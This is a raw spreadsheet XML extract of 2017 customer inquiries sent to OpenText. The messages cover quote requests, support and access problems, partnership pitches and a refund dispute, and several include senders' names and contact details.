We would expect to start the move this year, and even hope to finish the implementation and commence with rolling it out, and finish rolling out in 2018._x000D_
 _x000D_
In order for us to do so we are reaching out to you for some quick information on a ballpark figure for the below setup._x000D_
 _x000D_
Price indication on the following High-level requirements:_x000D_
 _x000D_
- 3 TB storage to start _x000D_
- 200 internal Users_x000D_
- 500 external Users_x000D_
- Global high Performance Cloud solution _x000D_
- 99.5 % SLA_x000D_
- Your customer service offering. We’re interested in building a partnership that can grow and evolve - and we will need ongoing support to ensure we’re updated and informed about best practises within your solution. Furthermore to help us make the most of the service offering._x000D_
_x000D_
_x000D_
- Price indication per additional TB and users would be appriciated._x000D_
_x000D_
_x000D_
We would also like to shcedule a demo of your solution, and talk a bit more of the challenges we are facing, and our business requirements._x000D_
But our current priority is to get a price indication in order to start the internal approval process. _x000D_
 _x000D_
Please feel free to reach out to me._x000D_
_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Kent Rasmussen_x000D_
Senior Project Manager_x000D_
Mob +45 3090 8070_x000D_
kent.rasmussen@carlsberg.com</t>
  </si>
  <si>
    <t>We have bi query installed on Karen Cannons laptop and she has a new windows 10 laptop and we need a copy of the software to install on the new laptop.</t>
  </si>
  <si>
    <t xml:space="preserve">I wrote to &lt;rhatzke@opentext.com&gt; Richard Hatzke "OPENTEXT Territory Account Executive Germany &amp; Switzerland" without any answer. I need some Information about "Roadshow OpenText/Captiva Capture 14.06.2017  in Düsseldorf "._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">please provide price quote for the following requirements from FBO Solicitation Number: 17-250-SOL-00245 Documentum Software Maintenance:_x000D_
Order Type (HW/SW/Maint/Supply)	Manufacturer	Manufacturer Part #	Product Description	Period of Performance	Quantity 	Unit Cost	Amount		Quantity 	Unit Cost	Amount		Quantity _x000D_
Maintenance		1000006385	RETENTION MANAGEMENT 201 - 500=UA	9/30/2017-9/30/2018	300				300				300_x000D_
		1000005547	DOCUMENTUM D2=UA Maintenance	9/30/2017-9/30/2018	300				300				300_x000D_
		1000005155	Content Trans Services Documents=ZA Maintenance	9/30/2017-9/30/2018	2				2				2_x000D_
		1000006355	Documentum Platform 201-500=UAx Maintenance	9/30/2017-9/30/2018	300				300				300_x000D_
		1000005549	DOCUMENTUM D2 PLUSPACK=UA Maintenance	9/30/2017-9/30/2018	300				300				300_x000D_
		1000012076	Legacy ECD Enhanced	9/30/2017-9/30/2018	1				1				1_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I reprisent a large currently undertaking a market scan for licensing costs regarding SaaS solutions. The client has expressed interest in the RightFax SaaS solution, Right Fax Connect. Would you be able to provide a high level, per user license cost for this software? _x000D_
_x000D_
Thankyou for your time_x000D_
Mark</t>
  </si>
  <si>
    <t>Please provide price quote for the following requirements for FBO Solicitation Number: N66001-17-Q-6787 Open Text Exceed Maintenance Renewal._x000D_
_x000D_
0001 Open Text Exceed Maintenance Renewal 102X VP5487_x000D_
P/N: EXMPI550701M-3 (POP 1Sep17-31aug18)_x000D_
Qty: 102 Each_x000D_
_x000D_
0002 One time Reinstatement fee Dec2015-Aug312017_x000D_
Qty: 1 Each_x000D_
_x000D_
0003 Open Text Exceed Maintenance Renewal 105X VP5487 69551-12315 P/N:_x000D_
EXMPI550700M-3 (POP 1Sep17-31aug18_x000D_
Qty: 105 Each_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Period of Performance : 1Sep 2017-31aug18_x000D_
_x000D_
_x000D_
_x000D_
Free on Board (FOB) Destination Shipping Address for Delivery and Acceptance:</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am performing a high level market scan for licensing costs of the EDM Open Text Platform as a SaaS solution. Would you be able to provide a high level, ball park, per user cost for this?_x000D_
_x000D_
Thankyou for your time._x000D_
Mark Wotherspoon</t>
  </si>
  <si>
    <t xml:space="preserve"> Please provide correction instruction for VIMI-15636</t>
  </si>
  <si>
    <t xml:space="preserve">The VEC project team are reviewing options for records management and we are interested in reviewing OpenText as a potential solution. We have a high level list of business needs that we wish to review the product against as a potential option. If a consultant would please contact me to arrange an overview of the product. I may be contacted between the hours of 8am and 4pm Monday to Friday via the business number provided above. </t>
  </si>
  <si>
    <t>We are working in a new project and we want to use the open text document management product</t>
  </si>
  <si>
    <t>Request full access to documentation and Knowledge base</t>
  </si>
  <si>
    <t>I am looking to speak with your sales support regarding Speech and Text analytics. If your company provides these services, please contact me at your earliest convenience._x000D_
_x000D_
Thank you,_x000D_
James</t>
  </si>
  <si>
    <t>Would like to install fax to email solution on our OB floor.  Please contact me with pricing.  thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
Back in 2007 we used to own 3 licenses for Hummingbird Exceed (license numbers S628699-000, SA91321-000, SA91322-000 for client 2028749) for Windows XP.  Few years ago, Entergy had switched to Windows 7, but did not need to use Exceed and did not purchase the new, applicable version.   _x000D_
Currently, a new software installed &amp; planned for production use ASAP, requires that Hummingbird Exceed v14.0 or higher is installed on 3 PCs.  From the selection of OpenText Exceed programs offered for sale on your Web site, would you mind to point me to a version that would correspond to “Hummingbird Exceed v14.0 or higher” as indicated by out software vendor?_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Need quote for OpenTest NFS Solo software.</t>
  </si>
  <si>
    <t>I am researching legal document management software vendors for a benchmark report for Gartner members and I would like to get a walk-through of your software.</t>
  </si>
  <si>
    <t>Hi OpenText Team,_x000D_
_x000D_
I'm reaching out regarding AI World 2017 (Boston, Dec 11-13), the largest event focused on the business and technology of enterprise AI and Machine Learning, for more information check out aiworld.com.  I'm hoping to set up a meeting with your marketing team to see if there's a way we can partner together in 2017._x000D_
_x000D_
Please let me know if interested!_x000D_
Thank you!_x000D_
-Ashley</t>
  </si>
  <si>
    <t>No access to key or download after verifying email address...</t>
  </si>
  <si>
    <t>I am interested in purchasing Brava and have several questions.</t>
  </si>
  <si>
    <t xml:space="preserve">Ken sounds like Shak from NMS Imaging was referred to me.  He is wanting to talk with a rep re. Image Pro or sometimes called Imaging for Windows 4.0.  I looked at rebranded solutions, but I am not able to find it.  Can someone assist and let me know which rep. I should refer him to.  Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Enterprise World 2018 Call for speakers/Speaking inquiry. We would love to learn more about how we can get involved with presenting ideas related to digital marketing, strategy and analytics. </t>
  </si>
  <si>
    <t xml:space="preserve">I am with General Networks, a Gold Partner to OpenText and have been trying to get access to the partner learning center to review our training requirements.  I have been able to log onto to OpenText Connect, and have requested access to Learning Central.  Unfortunately, I've been stuck in an endless loop for several weeks.  Michelle Hartzman, our partner manager has been working with me and has referred me to you guys for help.See link below for what I am trying to log into.  There is more detail I can provide--have been asked to confirm email at least 7 or 8 times, and I have confirmed email.  I also have received the notification that my request for access to support and learning has been received---but no access.  Can you help???  Thank you in advance!_x000D_
From: Michelle Hartzman [mailto:mhartzma@opentext.com] _x000D_
Sent: Tuesday, August 8, 2017 5:50 AM_x000D_
To: Cathy Ashbaugh &lt;cashbaugh@gennet.com&gt;_x000D_
Subject: RE: Request from General Networks- Sales Enablement program_x000D_
 _x000D_
Hi Cathy,_x000D_
 _x000D_
It was nice meeting you at Enterprise World.  Yes, there are eLearning requirements for you as a Gold Reseller.  We will require that you have 6 presales/sales consultants per contracted suite.  Your agreement is for eDocs and ECM suites.  The same 6 individuals can take the training per suite._x000D_
 _x000D_
All of the courses are in Learning Central.  The courses specific to ECM and eDocs can be found via this link:  https://learning.opentext.com/users/index.aspx under the Catalogue tab and then under Enterprise Content Management._x000D_
 _x000D_
Please let me know if you have any questions._x000D_
 _x000D_
Thanks_x000D_
Michelle _x000D_
</t>
  </si>
  <si>
    <t>Hi; Let's Talk Science would like to send an invitation to your Chairman, Tom Jenkins. Could you kindly provide an appropriate email address? Thank you.</t>
  </si>
  <si>
    <t>I need to have a letter of Assignment Assumption that needs to be signed by OpenText to assume an existing contract we have with HPE who owned Teleforms before selling to OpenText.  Some one from your Legal Dept., or Contract Administrator can help me with this request.</t>
  </si>
  <si>
    <t>Gostaria de verificar como podemos tornar a BAXTECH parceira da OPENTEXT, para alocações de consultores da ferramenta de VIM, para aliança em projetos, melhorias, suportes._x000D_
Aguardo,</t>
  </si>
  <si>
    <t>trying to get info on a contract for cisco ironport support. We at mylan aquired MEDA and need into on the contract. What we have listed is Cisco Ironport vendor EasyLink #301201</t>
  </si>
  <si>
    <t>I have tried to download Brava Reader numerous times, but never receive the e-mail with the link to download.</t>
  </si>
  <si>
    <t>Would like to provide workplace coffee arrangements to you London offices.</t>
  </si>
  <si>
    <t>Our current ECM, IBM content manager is going EOL and we are looking at Documentum as a possible option. I would like more info on features, and to know if there is a utility that can migrate content from IBM to the opentext solution?</t>
  </si>
  <si>
    <t>Query : can we a unpaid version of Opentext Products before purchasing the license . I am looking for Opentext WEM and Portal to get hands on and POC for potential customers to move to Opentext .</t>
  </si>
  <si>
    <t xml:space="preserve">Document resource management for Law Firms. </t>
  </si>
  <si>
    <t>Evaluation of the Open Text for Middle East and especially UAE market</t>
  </si>
  <si>
    <t xml:space="preserve">AIS wants to acquire the solution to support centralized document form template/format to generate various types of business or financial documents. The functions shall include form template/format management, data interface with AIS business applications, output management. In addition, we are looking for Archiving Management solution to handle documents stored in AIS Archiving system._x000D_
_x000D_
Please find our initial requirement in the attachment and provide relevant information._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
Wir von der ESG GmbH in Fürstenfeldbruck haben seit knapp sechs Jahren ein Dokumentenmanagementsystem im Haus. Aufgrund neuerer weitereichender Anforderungen soll dieses System nun abgelöst werden. Im Rahmen einer Analyse des Marktes möchten wir uns auch mit Ihrer Lösung genauer beschäftigen._x000D_
_x000D_
Wir streben dabei folgende Vorgehensweise an:_x000D_
•	Schritt 1: Wir schicken Ihnen einen Anforderungskatalog in Form einer Excel Datei zu. Wir würden Sie bitten, diese auszufüllen und an uns zurückzusenden._x000D_
•	Schritt 2: Parallel dazu planen wir einen gemeinsamen Termin vor Ort bei uns, an dem Sie uns das System präsentieren (Zeitraum September – November). Dabei wird die komplette Arbeitsgruppe, die abschließend die Auswahl des Systems trifft, anwesend sein. Damit Sie eine grobe Orientierung haben, wie wir aktuell in unserem System denken und arbeiten, erhalten Sie von mir vorab eine PDF Datei mit weiteren Infos._x000D_
•	Schritt 3: Präsentation vor Ort (ca. 2 Stunden). Durch die übermittelten PDF Datei können Sie die Präsentation darauf abstimmen, was die Teilnehmer sehen möchten. Zusätzlich können wir anhand der ausgefüllten Anforderungsdatei gezielter Fragen zum System stellen._x000D_
_x000D_
Die Abstimmung zu unserem gemeinsamen Termin läuft über mich. Wenn Sie während des ganzen Prozesses Rückfragen haben, können Sie sich natürlich auch jederzeit gerne an mich per Mail oder Telefon wenden._x000D_
_x000D_
Unser Ziel ist es, bis Ende 2017 ein System auszuwählen und, soweit möglich, Anfang 2018 in die Einführungs-/Migrationsphase zu starten._x000D_
_x000D_
Gerne können wir auch, um weitere Details zu klären, miteinander telefonieren._x000D_
_x000D_
Vielen Dank!_x000D_
_x000D_
Grüße,_x000D_
Mathias Schätzl_x000D_
</t>
  </si>
  <si>
    <t>We are looking to establish a security communication channel with Daimler IT facilities in different countries.</t>
  </si>
  <si>
    <t>We've tried reaching the UK branches to find out on the support we could get for utilising your products in a mac environments. We also have developers on hand to provide a end solution and allow for tweaking as per need arrises.</t>
  </si>
  <si>
    <t>URGENT URGENT_x000D_
Please send us correct bank details for invoice SCH08122163 - we have 2 different EUR accounts from you :_x000D_
CH5589095000017431988_x000D_
GB23CITI18500817431961_x000D_
Which one can we make the payment to ????_x000D_
Best regards_x000D_
Karina Hougaard</t>
  </si>
  <si>
    <t>I have been in contact with a Phoebe Sumagpao of your office who has been trying to sort out a payment back to us.  However I haven't heard from her for nearly a month and we are just about to start Court proceedings against you. _x000D_
_x000D_
As a last resort I'm sending you this in the hope that we don't have to go down this route._x000D_
_x000D_
From: Claire Bryant _x000D_
Sent: 17 August 2017 06:39_x000D_
To: 'Phoebe Sumagpao' &lt;psumagpa@opentext.com&gt;_x000D_
Subject: URGENT - Email Threatening Court Action_x000D_
_x000D_
Phoebe_x000D_
_x000D_
I refer to my email below of 18th July and have not received any response.  If we do not receive the payment due to us of £480.00 by the end of this week we will issue Court proceedings where your company will incur additional Court fees and accrued interest from the date of our payment to you. _x000D_
_x000D_
We do not wish to go down this route but feel we have no alternative. _x000D_
_x000D_
Regards_x000D_
_x000D_
Claire _x000D_
_x000D_
 _x000D_
_x000D_
Your friendly plain speaking IT partner_x000D_
Everything IT without the geek speak_x000D_
_x000D_
Follow us on Facebook too_x000D_
_x000D_
Main Office:           01522 718396_x000D_
Support Team:      01522 718192_x000D_
Projects Team:      01522 283023_x000D_
Web Site:                www.lcsit.com_x000D_
_x000D_
 _x000D_
_x000D_
From: Claire Bryant _x000D_
Sent: 18 July 2017 10:21_x000D_
To: 'Phoebe Sumagpao' &lt;psumagpa@opentext.com&gt;_x000D_
Subject: URGENT - Email Threatening Court Action_x000D_
_x000D_
Phoebe _x000D_
_x000D_
I refer to our numerous email correspondence initially dating back to 23rd May 2017 when we sent you a copy of our bank statement detailing the payment made in error to you on 30th March 2017 at 11.50am.  _x000D_
_x000D_
Since that time I have emailed you on a further TEN occasions (including on 12th June when we returned the completed refund request) but we have still not received payment. _x000D_
_x000D_
I have now been instructed to inform you that unless we receive the refund payment of £420.00 within the next SEVEN days we will have no alternative but to issue Court proceedings where we will claim back costs from yourselves as well as accrued interest from the date of the initial payment. _x000D_
_x000D_
Regards _x000D_</t>
  </si>
  <si>
    <t xml:space="preserve">We are planning to Upgrade our Database of OpenText  Products._x000D_
OpenText Archive Server 10.5 &amp; 10.1.1 version._x000D_
•	My question is current Archive Server version support Oracle 12C or not?_x000D_
OpenText Content Server 10SP2 Version._x000D_
•	Is the current version Support Oracle 12C or Not?_x000D_
OpenText IDM 20.1.60.626_x000D_
•	Is the current version Support Oracle 12C or Not?_x000D_
Note: We are currently using Oracle Database 11.2.0.4, 11.2.0.3 &amp; 11.2.0.2_x000D_
_x000D_
Waiting for your Reply.._x000D_
_x000D_
Thanks,_x000D_
Gowthaman.M- +91 9730846915_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We have been using RightFax for a long time and was just wondering whether there is a notification feature where a message or window pops up whenever there is a new fax received? We are using version 9.4.1.4070 and I have tried setting the notification options but we do not receive any notifications._x000D_
_x000D_
Could you let me know if there are any further options I need to set in order to get the notifications to work? If not, could you also let me know the upgrade options so that we can see the upgrade path and also to see whether it would be compatible with our existing systems._x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>I have the Free Brava DWG Viewer installed on a PC and when trying to open PDFs I'm receiving an error._x000D_
_x000D_
This file format is not licensed or an embedded file is not licensed. Contact your supplier for licensing details. _x000D_
_x000D_
I've tried uninstalling and reinstalling the software but it's hasn't helped. _x000D_
_x000D_
Can you please provide assistance?</t>
  </si>
  <si>
    <t>_x000D_
I am a sales agent of an independent Mexican company and requested a quote of 15 licenses</t>
  </si>
  <si>
    <t>I need to get the formula one 6.0 ..can you share the trial version..i need to work in a very old project of visual basic 6</t>
  </si>
  <si>
    <t xml:space="preserve">To get quotation for MAINTENANCE RENEWAL (OPENTEXT), HUMMINGBIRD EXCEED, Maintenance renewal for 2 years (Oct 2016 – Oct 2017 and Oct 2017 – Oct 2018) for 3 licenses_x000D_
</t>
  </si>
  <si>
    <t>We are investigating solutions for Validating Clinical and Non clinical data submission data. Please contact us.</t>
  </si>
  <si>
    <t>Trying to establish contact as directed with partners@opentext.com team and have sent numerous emails and received automated response be contacted in 24 hours but nothing. Our end user is requesting that his OpenText Support Renewal be run thru us but Rnwl's Team saying we are not setup as a Support Partner so needing to understand what this takes and some dialogue around this topic. If we have a Partner Business Mgr or relational would ask this POC reach out to me at 210-369-0318 / djones@comsoltx.com_x000D_
_x000D_
Thank you, David</t>
  </si>
  <si>
    <t xml:space="preserve">I have one report that works on my local computer (with Actuate BIRT Designer Professional version: 11.0.4  Build id: 20121023) and our iServer (DEV); I get error when I am trying to run on the iServer (STG) (console and iServer version 11Service Pack 4 Fix 1) . But, when I download it from iServer to my local computer (Actuate BIRT Designer Professional), it works properly again.  Would you please let know what could cause the error?  </t>
  </si>
  <si>
    <t>I'd like to get a demo of the faxing services from desktop and SAP._x000D_
I also would like to have a quote and time estimate on the fax solution implementation</t>
  </si>
  <si>
    <t>I have 200,000 pieces of paper that I need to scan, classify and associate with the appropriate records in Salesforce.</t>
  </si>
  <si>
    <t>We are looking for a document management solution for our legal team and I would like an overview of your product.</t>
  </si>
  <si>
    <t xml:space="preserve">I am a consultant representing a Pennsylvania Class 2A County who will be publishing an RFP for Data Warehousing and Business Intelligence within the next 30 days, and I need contact information (i.e. a target person and address where I should direct the RFP):  Person, Email, Phone, Address, Website (if different) to include on direct-mail list.  Can you provide?  Thank you, Don_x000D_
</t>
  </si>
  <si>
    <t>I want to use for personal use</t>
  </si>
  <si>
    <t>We want to automate the PTP process (OCR+approval workflow+ web , etc); do you have a sales representative in Buenos Aires?</t>
  </si>
  <si>
    <t>One of my colleagues is using Hummingbird BI to build queries and extract data from a legacy system. There is an ongoing requirement to extract that data and no prospect of changing the legacy system. Hummingbird BI will only work on Windows XP or older. Is there a modern replacement ? Do not put my name on a mailing list and do not pass my contact details onto a third party.</t>
  </si>
  <si>
    <t>I am unable to access the RightFax Administrator Guide.  After logging in, I'm in a continuous loop with verifying email.  (SUID), 06142-12483</t>
  </si>
  <si>
    <t>Periodic review of our vendor file for OpenText revealed that we do not have an ISO Certificate on file.  Can you please provide me with your current certificate?_x000D_
Please note that Cook Research Inc. is separate and independent from Med Institute of West Lafayette, IN._x000D_
Warm Regards, Tami Butts</t>
  </si>
  <si>
    <t xml:space="preserve">We continue to maintain an outdated version of Captaris Alchemy Server version 8.3 Build 600.213.  We have had a project to migrate the information out of alchemy into another ECM solution for 3+ years but due to a variety of reasons, we have not been successful at completing that transition just yet._x000D_
_x000D_
The captarislicenseserver.exe file resides on a physical box running windows 2003.  We need to decommission the box as it does not run the rest of Alchemy and only that service.  We are hoping we can obtain some consulting hours to help us move the service onto a different box so that Alchemy will continue to be accessible._x000D_
_x000D_
Please advise if this is something you can help us with._x000D_
_x000D_
thank you, </t>
  </si>
  <si>
    <t>Hi there. Exploring various OCR offerings. Looking to improve accuracy of capturing handwritten text. Wondering what products you would have for this and what the success rate is based on what quality/resolution samples. Any information you could forward would be helpful._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>open a ticket</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for an alternative DAM solution. </t>
  </si>
  <si>
    <t>Hello, I'm in the process of redeploying my departments FirstClass server and I'm hoping to get the full documentation to assist in the process._x000D_
_x000D_
I'd been working with support on getting a full 16.1 installer so this fresh redeployment didn't include any prior upgrades, earlier this week it was released and they provided it to me, but when I asked about documentation they said that typically comes from sales._x000D_
_x000D_
Can you all assist me in this matter?_x000D_
_x000D_
I did try calling but received voicemail and thought it better to send in a form._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Casey</t>
  </si>
  <si>
    <t>I cant download the free version it keeps asking me for a Windows update but my windows is up to date. I would like to purchase the full version, however, I don't want to waste my money if it wont work.</t>
  </si>
  <si>
    <t xml:space="preserve">Does Content Server 10.5 now support SQL Server 2012 SP3 ? </t>
  </si>
  <si>
    <t xml:space="preserve">Using your Leap Product </t>
  </si>
  <si>
    <t>Your product absolutely sucks. I can't even get a colleague's actual e-mail address. All that populates is his name as it's registered on the First Class system, NOT the actual e-mail address. What a piss poor design.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to acquire a 10 seat license for OpenText NFS Gateway product._x000D_
Talked to "Christina" on 8/15/2017 but at the time I wasn't sure of the product we required._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Gentleman:_x000D_
My name is Dormovil Ferreira, BS and CS in Computer Science from Brigham Young University in the USA._x000D_
I would like to discuss a new Business Opportunity with P. Thomas (Tom) Jenkins or Mark J. Barrenechea._x000D_
I am the single owner and president of DI2S www.di2s.com in Brazil._x000D_
Our Network is hosted at C7 Data Center in Utah._x000D_
We currently provide EDI services to a large number of Automotive companies in Brazil, Fiat, Honda, GM, Cummins, Iveco,  and all their suppliers._x000D_
We are extending our services to provide Financial Services on a global basis._x000D_
Please do not refer this to your Brazilian office. _x000D_
I want to talk to the people above, and only them._x000D_
Best Regards_x000D_
Dormovil Ferreira_x000D_
Email: prs@di2s.com_x000D_
Phone: 5511-3848-5780 (Direct)_x000D_
Cell: 5511-9-8155-0522_x000D_
</t>
  </si>
  <si>
    <t>My organization, NAREIT, is currently looking for a DAM. We have a few questions about your product:_x000D_
1) What is the price range?_x000D_
2) Can you tell me more about the integrations with Drupal? Is it a plug in? We're looking for something that will pull caption/credit into drupal as well. _x000D_
3) Does your product support https? _x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
With the new SAP GUI 7.50 released by SAP . Could you please list down which OpenText components are compatible with SAP GUI 7.50 and which are not . I am interested to know specially about the following:_x000D_
1) Enterprise Scan_x000D_
2) ICC_x000D_
3)Open Text Archiving and Document Access for SAP Solutions (OTWV,AS,ES etc)_x000D_
</t>
  </si>
  <si>
    <t>Dears,_x000D_
_x000D_
Our company (Engie Electrabel) is owning a TeamSite/LiveSite license that run version 8.1 in production. After discussing with your sales reps (Pepi Armara, Julia Rodgers), we thought about testing the new version (16.2) that should solve some problem we are currently experiencing._x000D_
Nevertheless we cannot access the resources (downloads, license key) to get the necessary files to set up this test. Your representatives told us going via the support is the best way to help us in this._x000D_
_x000D_
Thanks for your help,_x000D_
_x000D_
Eric Bourlon</t>
  </si>
  <si>
    <t>lost access to forum, downloads, knowledge base, but still working with customer university of southampton</t>
  </si>
  <si>
    <t xml:space="preserve">We have received post from your location Hilliard, OH but we are not interested, please remove from your addresslist :_x000D_
Fikso BV , Luijtenstraat 45 , Lekkerkerk NL 2941 CE_x000D_
</t>
  </si>
  <si>
    <t>Hi i am K. Chandra sekhar with hands on 2.5 years experience in wordpress, javascript, jquery, mysql, php, bootstrap, material design, html5, css3 In Aptagrim Consulting LLP Hyderabad.</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on a supply chain optimization project currently and one of the main priorities is to inculcate an EDI system into the warehouses. I would like to have information about how things are done by your company and the costs. </t>
  </si>
  <si>
    <t>We are using Streamserve Persuasion SP4 ..  We have haveing problems starting up some of the services due to a HTTPListener (scm)           Start request timed out</t>
  </si>
  <si>
    <t>Hi there, can you please get in touch with me regarding OpenText Capture Center for Spain? Thanks and regards, Jaco</t>
  </si>
  <si>
    <t>Request support Access - how to find system information?</t>
  </si>
  <si>
    <t>Need help with training 2 people on teamsite testing.</t>
  </si>
  <si>
    <t>Look for enterprise content management, and need to know what Access management solution can integrate with it (Saviynt/One identity/Omada)?</t>
  </si>
  <si>
    <t>OpenText for Office 365</t>
  </si>
  <si>
    <t>Quote for a Digital Assett Managment solution to store and organise images, videos and documents.</t>
  </si>
  <si>
    <t>We have an existing Exceed onDemand install and need more licenses.  I need a quote for an additional 265 EoD licenses and I need it as soon as possible.  We already own 135 licenses so will end up with a total of 400.</t>
  </si>
  <si>
    <t xml:space="preserve">I NEED TO VERIFY EMPLOYMENT ON MARK MORSE, SOFTWARE PROGRAMMER. I CANT SEEM TO FIND A NUMBER TO CONTACT. THANK YOU. </t>
  </si>
  <si>
    <t>Please provide price quote for the following requirement:_x000D_
FedBid Solicitation #: WX03102Y2017T OpenText Captiva License_x000D_
Item No.	Description	Qty	Unit_x000D_
001	OpenText Captiva License	1	EA</t>
  </si>
  <si>
    <t xml:space="preserve">We are in need of a content hub with the ability to house all of the different types of content we're creating and provide insights on what's working and how content can be optimized for customer experience </t>
  </si>
  <si>
    <t>Our support contract for OpenText is through our SAP contract (Gerdau, Brazil), but we need access to the OpenText support site to search the support site and download SP._x000D_
Please let me know how we can get access._x000D_
Thank you.</t>
  </si>
  <si>
    <t>We are getting a new Cisco Phone system and we need the ability to get fax to email.  Our current system does it now for us.  We have about 100 people that use Efax now.  So we were wondering how your product works and how is it setup.  Do you use sip trunking?  Also pricing.  _x000D_
_x000D_
Thanks_x000D_
Nick</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am trying to learn more about your Enterprise Content Management options in order to help a client make a purchasing decision. Any information you have on what differentiates you from your competitors, especially in the construction/project management space, would be greatly appreciated._x000D_
_x000D_
Thank you,_x000D_
Jeff Russell</t>
  </si>
  <si>
    <t>EverSource Wealth Advisors is a startup wealth advisory platform. We are building out our technology suite and would like to investigate your ECM and BPM offerings. Please contact me via email to setup a discovery call that may lead to a demo._x000D_
_x000D_
Regards,_x000D_
John Kirkland</t>
  </si>
  <si>
    <t>Greetings!!_x000D_
_x000D_
Would you be interested in acquiring Advertisers, Ad-Agencies, Publishers and/or Online Publishers, E-Commerce &amp; Social Media specific industry user contacts for your Marketing Campaigns? _x000D_
_x000D_
We have myriad of records of decision makers like CXOs, VPs, Directors and as so on with their respective direct telephone numbers and official email ids._x000D_
_x000D_
If you’re looking to expand your target audiences or shift to a different Industry focus please do let me know, so that, I can share a few contacts of decision makers as a sample without a cost attached._x000D_
Please mention your needs in the following order to come up with a sample for you:_x000D_
_x000D_
Targeted Geography:_x000D_
Targeted Industry:_x000D_
Targeted Titles:_x000D_
_x000D_
Thanks and looking forward to hear from you!_x000D_
_x000D_
Best Regards,_x000D_
Tyrion Xander,_x000D_
Marketing Manager,</t>
  </si>
  <si>
    <t>We are trying to find the contact information for our current Sales Representative at Opentext</t>
  </si>
  <si>
    <t>Product demo request. We use MediaBeacon right now, but are reviewing other products. The phone number provided is my cell phone as I'm teleworking this week. My regular office number is 703-614-9154</t>
  </si>
  <si>
    <t>We are an active trading partner currently set up on SPS Commerce, and we would like to transition to IBM Sterling Commerce.  We would like to obtain the procedures for testing to make this happen._x000D_
_x000D_
Here is some of our EDI info:_x000D_
_x000D_
VAN: IBM Sterling Commerce_x000D_
_x000D_
Test ID: 6309805110T_x000D_
Test Qualifier: 12_x000D_
_x000D_
Production ID: 6309805110_x000D_
Production Qualifier: 12_x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Account Manager is on AL. Trying to understand products and indicative pricing. </t>
  </si>
  <si>
    <t xml:space="preserve">How does OpenText for Engineering documents support Revit files?  Can we arrange a demo of this software?  My company will soon be doing an RFP/D for ECM software, but has specific requirements for architectural/engineering/construction files for which we would like to get some more information about OpenText capabilities.  Please contact me.  _x000D_
Thanks!_x000D_
Chris_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are currently looking at the various modules you provide and would like to understand a bit more about the purpose of the following and if it helps us in the future in order to purchase/renew. We already have Documentum license including RM and RPS:_x000D_
_x000D_
Documentum Developer Studio (Is this free to download or needs a license?)_x000D_
Documentum Forms User (how is this different than Forms Builder)_x000D_
Documentum Forms Builder (how is this different than Process Builder)_x000D_
Media Workspace/Digital Asset Manager_x000D_
My Documentum for MS Outlook_x000D_
Interactive Delivery Svcs Source Core_x000D_
Interactive Delivery Svsc Target Core_x000D_
Process Builder (Is this workflow manager?)_x000D_
_x000D_
Please call me or email me, if possible today, to get answers. We just need information to help us make the decision. _x000D_
_x000D_
Thank you,_x000D_
Sireen O'Mari_x000D_
sireen.omari@asrclkrec.com_x000D_
951-955-9381</t>
  </si>
  <si>
    <t>We are looking for potential fit with Opentext for our AP Automation project</t>
  </si>
  <si>
    <t>I need to hire an in the middle EDI service. This is my second contact attempt and nobody has contacted me. Is this an example of your support, or customer service?</t>
  </si>
  <si>
    <t>Do you have reports or research results on CRM systems?</t>
  </si>
  <si>
    <t>Dear Madam/Sir,_x000D_
I am Asli, Commercial Manager for Wix Hotels integration, previously the Partner Manager in HotelRunner, a SAAS based digital sales and marketing platform to help the property (either a hotel or a flat) to sell rooms through their own website and Facebook page, facilitate their integration with hundreds of online sales channels and agencies as well as boost the property’s social media recognition and visibility._x000D_
 _x000D_
I started over 2 years ago as Outbound Sales Manager and meanwhile also took care of the customers as a Outbound Support Account Manager and were promoted to be a Outbound Partner Manager in the beginning of April 2016, where I took care of major accounts like companies with more than 10 properties, PMS (Property Management System) integrations (Hotelogix and Basil365 were the key accounts I was handling) and trainings for the PMS company account managers, OTA (Online Travel Agency) integrations, such as Booking.com, Ostrovok, FastPay. Besides my duties as the Partner Manager, I did also deal with critical individual accounts._x000D_
 _x000D_
And in December 2016, I was announced to be the Commercial Manager for a brand new integration with Wix at their Hotels division using HotelRunner as their only Channel Manager where I am responsible for the efficient increase of the subscriptions as well as the technical support and the global marketing of the feature._x000D_
 _x000D_
The main things I do here are to listen well, understand well and diagnose the issue and solve them as soon as possible either on Live Support, on call or via email as the process which is crucial as they are live properties with running operations so any issue not solved within half an hour may cause financial damage to the property._x000D_
 _x000D_
Here we have both an ongoing flow of existing customers and their issues meanwhile some new integration processes with beta hotels and also a testing process management with the new features, so can be said that there are three branches of the global organi</t>
  </si>
  <si>
    <t>1. Image on grid on a layout is not displayed other than HTML format. We want to see the image when the report is run in PDF and Excel formats._x000D_
2. Image on grid on a layout is not displayed correctly when the report is run in HTML format if the image size is more than 849X1099X100DPI_x000D_
3. How to get multiple reports executed and displayed as one report output by taking prompts from first report ? Please provide example if you have any_x000D_
Regards_x000D_
Karuna Gollapudi</t>
  </si>
  <si>
